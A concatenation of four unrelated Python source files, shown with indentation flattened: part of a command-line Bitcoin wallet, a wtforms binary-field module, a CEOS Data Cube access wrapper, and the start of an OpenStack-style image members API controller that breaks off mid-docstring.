outs = tx_data.outs
chg = tx_data.change
chg_value = 0 if chg is None else chg[1]
spending = sum(o[1] for o in outs)
fee = from_addr.balance - (spending + chg_value)
# print origin address info
from_idx = wallet.idx_map.get(from_addr.addr)
from_idx_str = '' if from_idx is None else '[{}]'.format(from_idx)
print('From: {} {}'.format(from_addr.addr, from_idx_str))
# print output info
for o in outs:
to_idx = wallet.idx_map.get(o[0])
to_idx_str = '' if to_idx is None else '[{}]'.format(to_idx)
to_str = 'To: ' + colorize('yellow', '{}') + ' -> {} {}'
print(to_str.format(fmt_satoshi(o[1]), o[0], to_idx_str))
# print change info
chg_info = 'none'
if chg is not None:
chg_idx = wallet.idx_map.get(chg[0])
chg_idx_str = '' if chg_idx is None else '[{}]'.format(chg_idx)
chg_info = colorize('yellow', '{}') + ' -> {} {}'
chg_info = chg_info.format(fmt_satoshi(chg[1]), chg[0], chg_idx_str)
print('Change: ' + chg_info)
# print fee
btc_fee = fmt_satoshi(fee)
usd_fee = to_usd(btc_fee)
print('Fee: ' + colorize('yellow', '{} (${:.2f})').format(btc_fee, usd_fee))
# assert that all values add up and that nothing is lost
assert fee + spending + chg_value == from_addr.balance
if chg_value > 0:
assert chg[0] == chg_address_str
def send(wallet, addr_idx, to_address, amount, fee = None,
chg_address_str = None, craft_only = False):
from_addr = wallet.get(addr_idx)
if from_addr.balance is None or from_addr.balance < amount:
print('Insufficient balance on the specified address.')
return
from_addr = wallet.addresses[addr_idx]
chg_address = wallet.get_unused_addr()
if chg_address_str is None:
chg_address_str = from_addr.addr if chg_address is None else chg_address.addr
#address format validation
try:
b58check_to_bin(to_address)
b58check_to_bin(chg_address_str)
except:
print('Invalid destination or change address.')
return
tx, chg_idx = make_tx(from_addr, to_address, chg_address_str, amount, fee)
validate_tx(wallet, tx, chg_idx, from_addr, chg_address_str)
if craft_only:
print(tx)
elif prompt_bool('Proceed?'):
global PROVIDER
push_res = PROVIDER.pushtx(tx)
if (push_res[0]):
print('Transaction pushed.\ntxhash: %s' % txhash(tx))
else:
print('Push error: ' + push_res[1])
else:
print('Transaction aborted.')
def sweep(wallet, priv, to_addr_idx = None):
global PROVIDER
try:
exp = b58check_to_hex(priv)
except:
print('Not a valid private key.')
return
from_address = Address(exp)
from_address.balance = PROVIDER.get_address_info([from_address.addr])[0][0]
if to_addr_idx is not None:
to_address = wallet.get(to_addr_idx).addr
else:
unused_address = wallet.get_unused_addr()
if unused_address is None:
print('No free addresses')
return
else:
to_address = unused_address.addr
tx, chg_idx = make_tx(from_address, to_address, None, from_address.balance)
validate_tx(wallet, tx, None, from_address, None)
if prompt_bool('Proceed?'):
push_res = PROVIDER.pushtx(tx)
if (push_res[0]):
print('Transaction pushed.\ntxhash: %s' % txhash(tx))
else:
print('Push error: ' + push_res[1])
else:
print('Sweeping aborted.')
def print_wallet_header():
print('\n#\taddress\t\t\t\t\tUSD\t\tBTC')
def print_wallet_addresses(addresses, show_spent):
for a in addresses:
if a is None:
pass
else:
balance_str = 'N/A'
fiat_str = 'N/A'
if a.balance == 0 and not show_spent:
continue
if a.balance is not None:
balance_str = fmt_satoshi(a.balance)
fiat_str = '{0:.2f}'.format(to_usd(balance_str))
print('{}\t{}\t{}\t{}'.format(a.n, a.addr, fiat_str.ljust(10), balance_str))
def print_wallet_footer(wallet):
total = 0
for a in wallet.addresses:
if a.balance is not None:
total += a.balance
print(72 * '-')
usd_total = '{:.2f}'.format(to_usd(fmt_satoshi(total))).ljust(10)
print('TOTAL: \t\t\t\t\t\t{}\t{}'.format(usd_total, fmt_satoshi(total)))
def print_wallet(wallet, show_spent = False):
print_wallet_header()
print_wallet_addresses(wallet.addresses, show_spent)
print_wallet_footer(wallet)
def sign_text(address):
print('Enter the message to sign. End with a newline.\n')
text = raw_input()
sig = ecdsa_sign(text, address.priv)
print(sig)
def dump_addr(wallet, path):
f = open(path, 'w')
for a in wallet.addresses:
f.write(a.addr + '\n')
f.close()
print('Addresses saved to a file succesfully')
def display_help(cmds):
print('Type [command] -h to display help for a command.')
print('Available commands:')
for key in cmds:
print(key)
def refresh_wallet(wallet):
wallet.update_balances()
def fmt_satoshi(value):
return (float(value) / SATOSHIS)
def save_ph_to_file(filename, ph):
key = getpass.getpass('Encryption key:')
aes = AES(key)
iv_hex = ''.join('{:02x}'.format(i) for i in aes.get_iv_str())
ph_hex = ''.join('{:02x}'.format(i) for i in aes.encrypt(ph))
f = open(filename, 'w')
f.write(iv_hex + ph_hex)
f.close()
print('File saved succesfully.')
def get_ph_from_file(filename):
f = open(filename, 'r')
in_data = f.readline().strip()
f.close()
key = getpass.getpass('Decryption key:')
iv_bytes = hex_string_to_int_array(in_data[0:64])
ph_bytes = hex_string_to_int_array(in_data[64:])
aes = AES(key, iv_bytes)
ph = ''.join(chr(i) for i in aes.decrypt(ph_bytes) if i > 31)
return ph
def prompt_bool(question):
res = False
while True:
val = raw_input(question + ' (y/n)').lower()
if val == 'y' or val == 'n':
res = val == 'y'
break
else:
print("Error. Only y/n values are allowed.")
return res
def to_usd(amount):
global NO_FIAT, BTCUSD_RATE, BTCUSD_FETCHED
if NO_FIAT:
return 0
if amount is None: amount = 0
# caching the exchange rate for 5 minutes
if BTCUSD_RATE == 0 or BTCUSD_FETCHED + 300 < time.time():
try:
resp = make_request('https://apiv2.bitcoinaverage.com/indices/global/ticker/BTCUSD')
jsonobj = json.loads(resp)
BTCUSD_RATE = jsonobj['last']
BTCUSD_FETCHED = time.time()
except Exception as e:
pass
return amount * BTCUSD_RATE
def build_commands():
sendcmd = argparse.ArgumentParser(prog='send', description=
'Send bitcoins to a destination address.')
sendcmd.add_argument('idx', metavar = 'IDX', type=int,
help='Index of the address to send from')
sendcmd.add_argument('dest', metavar = 'DESTINATION', help = 'Destination address')
sendcmd.add_argument('amount', metavar = 'AMOUNT', type=float,
help='Amount of BTC to send')
sendcmd.add_argument('-f', '--fee', help='Transaction fee', type=float, default = None)
sendcmd.add_argument('-c', '--changeAddress', help='Change address')
sendcmd.add_argument('-m', '--makeOnly', action='store_true',
help='Only craft a tx and print it out without sending')
listcmd = argparse.ArgumentParser(prog='list', description=
'List the generated addresses.')
listcmd.add_argument('-s', '--showSpent', action='store_true',
help='Show used/spent addresses', default=False)
exitcmd = argparse.ArgumentParser(prog='exit', description='Exits the program.')
sweepcmd = argparse.ArgumentParser(prog='sweep', description=
'Sweep an exiting private key into an existing address.')
sweepcmd.add_argument('priv', metavar = 'PRIVKEY',
help = 'Private key to sweep (WIF format).')
sweepcmd.add_argument('-i', '--index', type=int, help=('Index of an existing address to sweep into.'
'If not specified, funds are swept into the first unused address.'))
refreshcmd = argparse.ArgumentParser(prog='refresh', description=
'Updates the balances.')
expandcmd = argparse.ArgumentParser(prog='expand', description=
'Expands a deterministic wallet by N entries.')
expandcmd.add_argument('n', metavar = 'N', help = 'Number of addresses to expand by.',
type=int, default = 5)
savepasscmd = argparse.ArgumentParser(prog='save', description=
'Encrypts the passphrase with AES and saves it to a file.')
savepasscmd.add_argument('-f', '--filename', default = 'key.txt', help = 'Custom file name')
dumpprivcmd = argparse.ArgumentParser(prog='dumppriv', description=
'Shows the private key for the specified index.')
dumpprivcmd.add_argument('idx', metavar = 'IDX', type=int, help = 'Address index')
helpcmd = argparse.ArgumentParser(prog='help', description='Displays help')
signcmd = argparse.ArgumentParser(prog='sign', description='Reads a plaintext and signs it.')
signcmd.add_argument('idx', metavar = 'IDX', type=int,
help='Index of the address whose private key to sign with')
dumpaddrcmd = argparse.ArgumentParser(prog='dumpaddr', description='Dumps all generated '
'addresses to a file')
dumpaddrcmd.add_argument('-p', '--path', help = 'The path to the file',
default="addresses.txt")
cmds = {}
cmds['send'] = sendcmd
cmds['list'] = listcmd
cmds['exit'] = exitcmd
cmds['refresh'] = refreshcmd
cmds['sweep'] = sweepcmd
cmds['expand'] = expandcmd
cmds['save'] = savepasscmd
cmds['dumppriv'] = dumpprivcmd
cmds['help'] = helpcmd
cmds['sign'] = signcmd
cmds['dumpaddr'] = dumpaddrcmd
return cmds
def main():
data_provider_help = 'data provider for the wallet'
no_conv_help = 'turns off fiat conversion'
file_help = 'reads the passphrase from a previously saved key file'
diceware_help = 'interprets the passphrase as a series of diceware numbers'
offline_help = 'starts the wallet in the offline mode'
url_help = '''sets a custom hostname for the selected data provider.
The format should be e.g. http[s]://url.com[:80].
Useful for open source block explorers that exist in different
locations but have identical operation contracts'''
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--dataProvider',
choices=['blockchaininfo', 'blockr', 'insight', 'blockcypher'],
default='blockchaininfo', help = data_provider_help)
parser.add_argument('-n', '--noConversion', action='store_true',
default=False, help = no_conv_help)
parser.add_argument('-f', '--file', help = file_help)
parser.add_argument('-w', '--diceware', action='store_true',
default=False, help = diceware_help)
parser.add_argument('-o', '--offline', action='store_true',
default=False, help = offline_help)
parser.add_argument('-u', '--url', help = url_help)
args = parser.parse_args()
global NO_FIAT, PROVIDER, RECOMMENDED_FEE
PROVIDER = get_provider_by_name(args.dataProvider)
NO_FIAT = args.noConversion
try:
resp = make_request('https://bitcoinfees.21.co/api/v1/fees/recommended')
jsonobj = json.loads(resp)
RECOMMENDED_FEE = min(1000, jsonobj['fastestFee'])
except Exception as e:
print('Failed to fetch the recommended fee. '
'Using {} satoshis per byte'.format(RECOMMENDED_FEE))
if args.url is not None:
PROVIDER.host = args.url.strip().strip('/')
print('Data provider: {}, host: {}'.format(
colorize('yellow', PROVIDER.name()),
colorize('yellow', PROVIDER.host)))
ph = None
filename = None
if args.file is None and os.path.isfile('key.txt'):
filename = 'key.txt'
elif args.file is not None:
if os.path.isfile(args.file):
filename = args.file
else:
print('Could not find the specified file. Enter passphrase manually.')
if filename is not None:
print('Decrypting file and extracting passphrase...')
try:
ph = get_ph_from_file(filename)
except IOError:
print('Could not decrypt the file.')
return
else:
ph = getpass.getpass('Seed:')
if args.diceware is True:
diceware_dict = diceware.load_diceware()
ph = diceware.to_string(ph, diceware_dict)
wallet = Wallet(ph)
if not args.offline:
wallet.auto_init()
print('Used addressess with a balance of zero BTC are hidden.\n'
'Use list -s to show such addresses.\n')
else:
print(colorize('yellow', 'Wallet offline. Use "expand" to generate addresses'))
print_wallet(wallet)
cmds = build_commands()
print("Type 'help' to display available commands")
while True:
try:
if not input_loop(cmds, wallet):
break
except AddrOutOfRangeEx:
print('The specified address index is out of generated range. '
'Use the expand command to generate more addresses.')
except Exception as e:
import traceback
print('Error:')
traceback.print_exc()
del(ph)
del(wallet)
cls()
def input_loop(cmds, wallet):
input = raw_input('> ').strip()
c = input.split(' ', 1)[0]
if c == '':
return True
cmd = cmds.get(c)
if cmd is None:
print('No such command. Type help to see available commands')
return True
cmd_args = None
try:
cmd_args = cmd.parse_args(input.split()[1:])
except SystemExit:
return True
if c == 'send':
send( wallet, cmd_args.idx, cmd_args.dest,
int(cmd_args.amount * SATOSHIS),
int(cmd_args.fee * SATOSHIS) if cmd_args.fee is not None else None,
cmd_args.changeAddress,
cmd_args.makeOnly)
elif c == 'help':
display_help(cmds)
elif c == 'list':
print_wallet(wallet, cmd_args.showSpent)
elif c == 'refresh':
refresh_wallet(wallet)
elif c == 'sweep':
sweep(wallet, cmd_args.priv, cmd_args.index)
elif c == 'q' or c == 'quit' or c == 'exit':
return False
elif c == 'expand':
wallet.expand(cmd_args.n)
elif c == 'save':
save_ph_to_file('key.txt', wallet.passphrase)
elif c == 'dumppriv':
print(wallet.get(cmd_args.idx).priv)
elif c == 'sign':
sign_text(wallet.get(cmd_args.idx))
elif c == 'dumpaddr':
dump_addr(wallet, cmd_args.path)
elif c == 'exit':
return False
return True
def cls():
from subprocess import call
system = platform.system()
if system == 'Linux':
call('reset', shell = True)
elif system == 'Windows':
call('cls', shell = True)
def update_progress(progress, text):
barLength = 20
status = ""
if progress < 0:
progress = 0
status = "Halt...\n"
if progress >= 1:
progress = 1
status = "Done...\n"
block = int(round(barLength*progress))
text = "\r" + text + ": [{0}] {1:.0f}% {2}".format(
"|"*block + "-"*(barLength-block), progress*100, status)
sys.stdout.write(text)
sys.stdout.flush()
def colorize(color, text):
system = platform.system()
if system != 'Linux':
return text
else:
colors = {
'header': '\033[95m',
'blue': '\033[94m',
'green': '\033[92m',
'yellow': '\033[93m',
'fail': '\033[91m',
'end': '\033[0m',
'bold': '\033[1m',
'underline': '\033[4m',
}
return colors[color] + text + colors['end']
if __name__ == "__main__":
main()
|
|
import struct
import wtforms
from wtforms.validators import Length, NumberRange
from . import core
class BasicBinaryField(core.BinaryField):
# Some BinaryFields will have inherent value restrictions, based on the
# limitations of the serialized form. For example, a UInt8Field cannot
# store numbers above 0xFF. When the class is instantiated, these
# validators will be silently added to any validators provided by the
# constructor.
initial_validators = []
def __init__(self, label='', validators=None, order=None, **kwargs):
core.BinaryItem.__init__(self)
self.size = struct.calcsize(self.pack_string)
self.order = order
# Clone the initial_validators list to avoid mutating a class
# variable.
all_vldtrs = list(self.initial_validators)
if validators is not None:
all_vldtrs.extend(validators)
self.form_field = self.form_field_class(label, all_vldtrs, **kwargs)
def pack(self, data, order=None):
order = self.order or order or ''
return self.pack_data(data, order)
def pack_data(self, data, order):
return struct.pack(order + self.pack_string, data)
def unpack(self, buffer, order=None):
order = self.order or order or ''
return self.unpack_data(buffer, order)
def unpack_data(self, buffer, order):
return struct.unpack(order + self.pack_string, buffer)[0]
class CharField(BasicBinaryField):
"""
Store a single byte as a one-character ``str`` (in Python 2) or ``bytes``
object (in Python 3).
Attributes:
size: always ``1``
form_field: A :class:`wtforms.fields.StringField` instance.
"""
form_field_class = wtforms.StringField
initial_validators = [Length(min=1, max=1)]
pack_string = 'c'
class BinaryBooleanField(BasicBinaryField):
"""
Store either ``True`` or ``False`` as ``b'\\x01'`` or ``b'\\x00'``
(respectively).
Attributes:
size: always ``1``
form_field: A :class:`wtforms.fields.BooleanField` instance.
"""
form_field_class = wtforms.BooleanField
pack_string = '?'
class BinaryIntegerField(BasicBinaryField):
"""
This class should not be instantiated directly; instead, you should use
one of its subclasses, which determine what kind of int is stored, and
how. Those subclasses are:
==================== ==== =============== ================
Name size Min Max
==================== ==== =============== ================
:class:`Int8Field` 1 -128 127
:class:`UInt8Field` 1 0 255
:class:`Int16Field` 2 -32768 32767
:class:`UInt16Field` 2 0 65535
:class:`Int32Field` 4 -2\ :sup:`31` 2\ :sup:`31` - 1
:class:`UInt32Field` 4 0 2\ :sup:`32` - 1
:class:`Int64Field` 8 -2\ :sup:`63` 2\ :sup:`63` - 1
:class:`UInt64Field` 8 0 2\ :sup:`64` - 1
==================== ==== =============== ================
Attributes:
form_field: A :class:`wtforms.fields.Integerfield` instance.
"""
form_field_class = wtforms.IntegerField
@property
def initial_validators(self):
return [NumberRange(self.min, self.max)]
class Int8Field(BinaryIntegerField):
pack_string = 'b'
min = -128
max = 127
class UInt8Field(BinaryIntegerField):
pack_string = 'B'
min = 0
max = (2 ** 8) - 1
class Int16Field(BinaryIntegerField):
pack_string = 'h'
min = -(2 ** 15)
max = (2 ** 15) - 1
class UInt16Field(BinaryIntegerField):
pack_string = 'H'
min = 0
max = (2 ** 16) - 1
class Int32Field(BinaryIntegerField):
pack_string = 'i'
min = -(2 ** 31)
max = (2 ** 31) - 1
class UInt32Field(BinaryIntegerField):
pack_string = 'I'
min = 0
max = (2 ** 32) - 1
class Int64Field(BinaryIntegerField):
pack_string = 'q'
min = -(2 ** 63)
max = (2 ** 63) - 1
class UInt64Field(BinaryIntegerField):
pack_string = 'Q'
min = 0
max = (2 ** 64) - 1
class Float32Field(BasicBinaryField):
"""
Store a ``float`` in four bytes.
Attributes:
size: Always ``4``.
form_field: A :class:`wtforms.fields.FloatField` instance.
"""
form_field_class = wtforms.FloatField
pack_string = 'f'
class Float64Field(BasicBinaryField):
"""
Store a ``float`` in eight bytes.
Attributes:
size: Always ``8``.
form_field: A :class:`wtforms.fields.FloatField` instance.
"""
form_field_class = wtforms.FloatField
pack_string = 'd'
class BytesField(BasicBinaryField):
"""
Store *N* bytes.
Attributes:
max_length: Maximum number of bytes in the stored string. Note that
this may not be equal to :attr:`size`.
size: The :attr:`size` of a :class:`BytesField` with ``max_length``
*N* varies based on the *length* argument used to construct it.
If *length* is :attr:`~minform.FIXED` or
:attr:`~minform.AUTOMATIC`, ``size`` will be *N*.
If *length* is :attr:`~minform.EXPLICIT`, there will be one or
more extra bytes at the beginning of the packed data, which store
the number of bytes used by the string. This will be the smallest
number of bytes needed to store a number up to ``max_length``. So,
``size`` can be *N+1*, *N+2*, *N+4*, or *N+8*. (For more
information, see the documentation for :data:`~minform.EXPLICIT`.)
form_field: A :class:`wtforms.fields.StringField` instance.
"""
form_field_class = wtforms.StringField
def __init__(self, label='', validators=None, max_length=None,
length=core.AUTOMATIC, order=None, **kwargs):
if not isinstance(max_length, int) or max_length < 0:
raise ValueError('BytesField must be created with a '
'positive max_length keyword argument.')
self.order = order
self.length = length
self.max_length = max_length
if self.length == core.FIXED:
self.initial_validators = [Length(max=max_length, min=max_length)]
self.pack_string = '{0}s'.format(max_length)
elif self.length == core.AUTOMATIC:
self.initial_validators = [Length(max=max_length)]
self.pack_string = '{0}s'.format(max_length)
elif self.length == core.EXPLICIT:
self.initial_validators = [Length(max=max_length)]
self.length_field = store_numbers_up_to(max_length, order=order)
self.pack_string = '{0}{1}s'.format(self.length_field.pack_string,
max_length)
super(BytesField, self).__init__(label, validators, order, **kwargs)
def pack_data(self, data, order):
buffer = bytearray(self.size)
length = len(data)
if self.length == core.EXPLICIT:
pack_length_string = order + self.length_field.pack_string
struct.pack_into(pack_length_string, buffer, 0, length)
start = self.length_field.size
else:
start = 0
buffer[start:start+length] = data
return buffer
def unpack_data(self, buffer, order):
if self.length == core.EXPLICIT:
unpack_length_string = order + self.length_field.pack_string
length = struct.unpack_from(unpack_length_string, buffer)[0]
if length > self.max_length:
message = "Buffer cannot contain {0} bytes.".format(length)
raise ValueError(message)
data_buffer = buffer[self.length_field.size:]
else:
length = self.max_length
data_buffer = buffer
data = data_buffer[:length]
if self.length == core.AUTOMATIC:
data = data.rstrip(b'\x00')
return data
def store_numbers_up_to(n, signed=False, **kwargs):
"""
Return a BinaryField class that can store numbers up to a certain maximum.
If the number is too big to store, a ``ValueError`` will be raised.
Parameters:
n: The highest number that you expect to need to store (must be at
most a 64-bit integer).
signed: Return a field that can store negative numbers.
kwargs: Additional arguments get passed into the binary field
constructor.
Returns:
BinaryIntegerField: A :class:`BinaryIntegerField` that can store
numbers up to at least ``n``.
"""
if signed:
if n <= Int8Field.max:
return Int8Field(**kwargs)
elif n <= Int16Field.max:
return Int16Field(**kwargs)
elif n <= Int32Field.max:
return Int32Field(**kwargs)
elif n <= Int64Field.max:
return Int64Field(**kwargs)
else:
raise ValueError("Can't track numbers up to {0}".format(n))
else:
if n <= UInt8Field.max:
return UInt8Field(**kwargs)
elif n <= UInt16Field.max:
return UInt16Field(**kwargs)
elif n <= UInt32Field.max:
return UInt32Field(**kwargs)
elif n <= UInt64Field.max:
return UInt64Field(**kwargs)
else:
raise ValueError("Can't track numbers up to {0}".format(n))
|
|
# Copyright 2016 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. All Rights Reserved.
#
# Portion of this code is Copyright Geoscience Australia, Licensed under the
# Apache License, Version 2.0 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of the License
# at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# The CEOS 2 platform is licensed under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# datacube imports.
import datacube
from datacube.api import *
# basic stuff.
from collections import defaultdict
import time
from datetime import datetime
import json
# dc data comes out as xray arrays
import xarray as xr
import xarray.ufuncs
# gdal related stuff.
import gdal
from gdalconst import *
# np for arrays
import numpy as np
# Author: AHDS
# Creation date: 2016-06-23
# Modified by:
# Last modified date: 2016-08-05
class DataAccessApi:
"""
Class that provides wrapper functionality for the DataCube.
"""
dc = None
api = None
# defaults for all the required fields.
product_default = 'ls7_ledaps'
platform_default = 'LANDSAT_7'
def __init__(self):
# using both the datacube object and the api.
# dc is useful for all data access, api is only really used for metadata
# fetching.
# hardcoded config location. could parameterize.
self.dc = datacube.Datacube(config='/home/localuser/Datacube/data_cube_ui/config/.datacube.conf')
#self.dc = datacube.Datacube()
self.api = datacube.api.API(datacube=self.dc)
"""
query params are defined in datacube.api.query
"""
def get_dataset_by_extent(self, product, product_type=None, platform=None, time=None,
longitude=None, latitude=None, measurements=None, output_crs=None, resolution=None):
"""
Gets and returns data based on lat/long bounding box inputs.
All params are optional. Leaving one out will just query the dc without it, (eg leaving out
lat/lng but giving product returns dataset containing entire product.)
Args:
product (string): The name of the product associated with the desired dataset.
product_type (string): The type of product associated with the desired dataset.
platform (string): The platform associated with the desired dataset.
time (tuple): A tuple consisting of the start time and end time for the dataset.
longitude (tuple): A tuple of floats specifying the min,max longitude bounds.
latitude (tuple): A tuple of floats specifying the min,max latitutde bounds.
measurements (list): A list of strings that represents all measurements.
output_crs (string): Determines reprojection of the data before its returned
resolution (tuple): A tuple of min,max ints to determine the resolution of the data.
Returns:
data (xarray): dataset with the desired data.
"""
# there is probably a better way to do this but I'm not aware of it.
query = {}
if product_type is not None:
query['product_type'] = product_type
if platform is not None:
query['platform'] = platform
if time is not None:
query['time'] = time
if longitude is not None and latitude is not None:
query['longitude'] = longitude
query['latitude'] = latitude
data = self.dc.load(product=product, measurements=measurements,
output_crs=output_crs, resolution=resolution, **query)
# data = self.dc.load(product=product, product_type=product_type, platform=platform, time=time, longitude=longitude,
# latitude=latitude, measurements=measurements, output_crs=output_crs,
# resolution=resolution)
return data
def get_dataset_tiles(self, product, product_type=None, platform=None, time=None,
longitude=None, latitude=None, measurements=None, output_crs=None, resolution=None):
"""
Gets and returns data based on lat/long bounding box inputs.
All params are optional. Leaving one out will just query the dc without it, (eg leaving out
lat/lng but giving product returns dataset containing entire product.)
Args:
product (string): The name of the product associated with the desired dataset.
product_type (string): The type of product associated with the desired dataset.
platform (string): The platform associated with the desired dataset.
time (tuple): A tuple consisting of the start time and end time for the dataset.
longitude (tuple): A tuple of floats specifying the min,max longitude bounds.
latitude (tuple): A tuple of floats specifying the min,max latitutde bounds.
measurements (list): A list of strings that represents all measurements.
output_crs (string): Determines reprojection of the data before its returned
resolution (tuple): A tuple of min,max ints to determine the resolution of the data.
Returns:
data (xarray): dataset with the desired data in tiled sections.
"""
# there is probably a better way to do this but I'm not aware of it.
query = {}
if product_type is not None:
query['product_type'] = product_type
if platform is not None:
query['platform'] = platform
if time is not None:
query['time'] = time
if longitude is not None and latitude is not None:
query['longitude'] = longitude
query['latitude'] = latitude
#set up the grid workflow
gw = GridWorkflow(self.dc.index, product=product)
#dict of tiles.
request_tiles = gw.list_cells(product=product, measurements=measurements,
output_crs=output_crs, resolution=resolution, **query)
"""
tile_def = defaultdict(dict)
for cell, tiles in request_tiles.items():
for time, tile in tiles.items():
tile_def[cell, time]['request'] = tile
keys = list(tile_def)
data_tiles = {}
for key in keys:
tile = tile_def[key]['request']
data_tiles[key[0]] = gw.load(key[0], tile)
"""
#cells now return stacked xarrays of data.
data_tiles = {}
for tile_key in request_tiles:
tile = request_tiles[tile_key]
data_tiles[tile_key] = gw.load(tile, measurements=measurements)
return data_tiles
def get_scene_metadata(self, platform, product, longitude=None, latitude=None, crs=None, time=None):
"""
Gets a descriptor based on a request.
Args:
platform (string): Platform for which data is requested
product_type (string): Product type for which data is requested
longitude (tuple): Tuple of min,max floats for longitude
latitude (tuple): Tuple of min,max floats for latitutde
crs (string): Describes the coordinate system of params lat and long
time (tuple): Tuple of start and end datetimes for requested data
Returns:
scene_metadata (dict): Dictionary containing a variety of data that can later be
accessed.
"""
descriptor_request = {}
if platform is not None:
descriptor_request['platform'] = platform
if longitude is not None and latitude is not None:
dimensions = {}
longitude_dict = {}
latitude_dict = {}
time_dict = {}
longitude_dict['range'] = longitude
latitude_dict['range'] = latitude
if crs is not None:
longitude_dict['crs'] = crs
latitude_dict['crs'] = crs
dimensions['longitude'] = longitude_dict
dimensions['latitude'] = latitude_dict
if time is not None:
time_dict['range'] = time
dimensions['time'] = time_dict
descriptor_request['dimensions'] = dimensions
descriptor = self.api.get_descriptor(descriptor_request=descriptor_request)
scene_metadata = {}
if product in descriptor and len(descriptor[product]['result_min']) > 2:
scene_metadata['lat_extents'] = (descriptor[product]['result_min'][1], descriptor[product]['result_max'][1])
scene_metadata['lon_extents'] = (descriptor[product]['result_min'][2], descriptor[product]['result_max'][2])
scene_metadata['time_extents'] = (descriptor[product]['result_min'][0], descriptor[product]['result_max'][0])
scene_metadata['tile_count'] = len(descriptor[product]['storage_units'])
scene_metadata['scene_count'] = descriptor[product]['result_shape'][0]
scene_metadata['pixel_count'] = descriptor[product]['result_shape'][1] * descriptor[product]['result_shape'][2]
scene_metadata['storage_units'] = descriptor[product]['storage_units']
else:
scene_metadata = {'lat_extents': (0,0), 'lon_extents': (0,0), 'time_extents': (0,0), 'tile_count': 0, 'scene_count': 0, 'pixel_count': 0, 'storage_units': {}}
return scene_metadata
def list_acquisition_dates(self, platform, product, longitude=None, latitude=None, crs=None, time=None):
"""
Get a list of all acquisition dates for a query.
Args:
platform (string): Platform for which data is requested
product_type (string): Product type for which data is requested
longitude (tuple): Tuple of min,max floats for longitude
latitude (tuple): Tuple of min,max floats for latitutde
crs (string): Describes the coordinate system of params lat and long
time (tuple): Tuple of start and end datetimes for requested data
Returns:
times (list): Python list of dates that can be used to query the dc for single time
sliced data.
"""
metadata = self.get_scene_metadata(platform, product, longitude=longitude, latitude=latitude, crs=crs, time=time)
#gets a list of times, corrected for utc offset.
# (unit[0] + unit[0].utcoffset()) if unit[0].utcoffset() else
times = set([unit[0] for unit in metadata['storage_units'].keys()])
return sorted(times)
def get_datacube_metadata(self, platform, product):
"""
Gets some details on the cube and its contents.
Args:
platform (string): Desired platform for requested data.
product (string): Desired product for requested data.
Returns:
datacube_metadata (dict): a dict with multiple keys containing relevant metadata.
"""
descriptor = self.api.get_descriptor({'platform': platform})
datacube_metadata = {}
if product in descriptor:
datacube_metadata['lat_extents'] = (descriptor[product]['result_min'][1], descriptor[product]['result_max'][1])
datacube_metadata['lon_extents'] = (descriptor[product]['result_min'][2], descriptor[product]['result_max'][2])
datacube_metadata['time_extents'] = (descriptor[product]['result_min'][0], descriptor[product]['result_max'][0])
datacube_metadata['tile_count'] = len(descriptor[product]['storage_units'])
datacube_metadata['scene_count'] = descriptor[product]['result_shape'][0]
datacube_metadata['pixel_count'] = descriptor[product]['result_shape'][1] * descriptor[product]['result_shape'][2]
else:
datacube_metadata = {'lat_extents': (0,0), 'lon_extents': (0,0), 'time_extents': (0,0), 'tile_count': 0, 'scene_count': 0, 'pixel_count': 0}
return datacube_metadata
|
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import glance_store
from oslo.serialization import jsonutils
from oslo_log import log as logging
from oslo_utils import timeutils
import six
import webob
from daisy.api import policy
from daisy.common import exception
from daisy.common import utils
from daisy.common import wsgi
import daisy.db
import daisy.gateway
from daisy import i18n
import daisy.notifier
import daisy.schema
LOG = logging.getLogger(__name__)
_ = i18n._
class ImageMembersController(object):
def __init__(self, db_api=None, policy_enforcer=None, notifier=None,
store_api=None):
self.db_api = db_api or daisy.db.get_api()
self.policy = policy_enforcer or policy.Enforcer()
self.notifier = notifier or daisy.notifier.Notifier()
self.store_api = store_api or glance_store
self.gateway = daisy.gateway.Gateway(self.db_api, self.store_api,
self.notifier, self.policy)
@utils.mutating
def create(self, req, image_id, member_id):
"""
Adds a membership to the image.
:param req: the Request object coming from the wsgi layer
:param image_id: the image identifier
:param member_id: the member identifier
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
'status': <MEMBER_STATUS>
'created_at': ..,
'updated_at': ..}
"""
image_repo = self.gateway.get_repo(req.context)
image_member_factory = self.gateway.get_image_member_factory(
req.context)
try:
image = image_repo.get(image_id)
member_repo = image.get_member_repo()
new_member = image_member_factory.new_image_member(image,
member_id)
member_repo.add(new_member)
return new_member
except exception.NotFound:
msg = _("Image %s not found.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPNotFound(explanation=msg)
except exception.Forbidden:
msg = _("Not allowed to create members for image %s.") % image_id
LOG.warning(msg)
raise webob.exc.HTTPForbidden(explanation=msg)
except exception.Duplicate:
msg = _("Member %(member_id)s is duplicated for image "
"%(image_id)s") % {"member_id": member_id,
"image_id": image_id}
LOG.warning(msg)
raise webob.exc.HTTPConflict(explanation=msg)
except exception.ImageMemberLimitExceeded as e:
msg = (_("Image member limit exceeded for image %(id)s: %(e)s:")
% {"id": image_id, "e": utils.exception_to_str(e)})
LOG.warning(msg)
raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg)
@utils.mutating
def update(self, req, image_id, member_id, status):
"""
Adds a membership to the image.
:param req: the Request object coming from the wsgi layer
:param image_id: the image identifier
:param member_id: the member identifier
:retval The response body is a mapping of the following form::
{'member_id': <MEMBER>,
'image_id': <IMAGE>,
